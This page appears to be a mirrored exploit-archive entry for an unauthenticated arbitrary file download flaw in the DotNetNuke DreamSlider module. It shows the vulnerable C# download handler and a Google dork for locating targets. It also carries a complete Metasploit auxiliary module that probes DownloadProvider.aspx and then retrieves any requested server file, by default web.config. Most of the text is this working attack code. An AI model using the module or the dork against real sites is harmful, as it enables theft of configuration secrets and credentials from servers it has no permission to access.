扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 |
# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download # Date: 23/01/2014 # Author: Glafkos Charalambous # Version: 01.01.02 # Vendor: DreamSlider # Vendor URL: http://www.dreamslider.com/ # Google Dork: inurl:/DesktopModules/DreamSlider/ # CVE: # # Description # DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability # # Vulnerable Code # # namespace DotNetNuke.Modules.DreamSlider # { #using System; #using System.IO; #using System.Web.SessionState; #using System.Web.UI; # #public class DownloadProvider : Page, IRequiresSessionState #{ #protected void Page_Load(object sender, EventArgs e) #{ #if (!base.IsPostBack && (base.Request.QueryString["File"] != null)) #{ #string path = base.Request.QueryString["File"]; #string fileName = Path.GetFileName(path); #base.Response.ContentType = "application/octet-stream"; #base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName); #base.Response.WriteFile(path); #base.Response.End(); #} #} #} # } ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'DotNetNuke DreamSlider Arbitrary File Download', 'Description'=> %q{ This module exploits an unauthenticated arbitrary file download vulnerability in DNN DreamSlider version 01.01.02 and below. }, 'Author' => [ 'Glafkos Charalambous', # Discovery and Metasploit module ], 'License'=> MSF_LICENSE, 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'DisclosureDate' => 'Mar 23 2015')) register_options( [ Opt::RPORT(80), OptString.new('FILENAME', [true, 'File to download', '~/web.config']), OptString.new('PATH', [true, 'Path of DNN Nuke', '/']), ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"), 'cookie' => datastore['Cookie'], }) if res && res.code == 200 and res.body.to_s =~ /Download Provider/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end Exploit::CheckCode::Safe end end def run begin print_status("#{peer} - Downloading file #{datastore['FILENAME']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'], 'cookie' => datastore['Cookie'], }) rescue Rex::ConnectionError print_error("#{peer} - Could not connect.") return end if res && res.code == 200 if res.body.to_s.bytesize == 0 print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") return end fileName = datastore['FILENAME'] path = store_loot( 'ds.http', 'application/octet-stream', datastore['RHOST'], res.body, fileName ) print_good("#{peer} - File saved in: #{path}") else print_error("#{peer} - Failed to download file.") end end end |
体验盒子
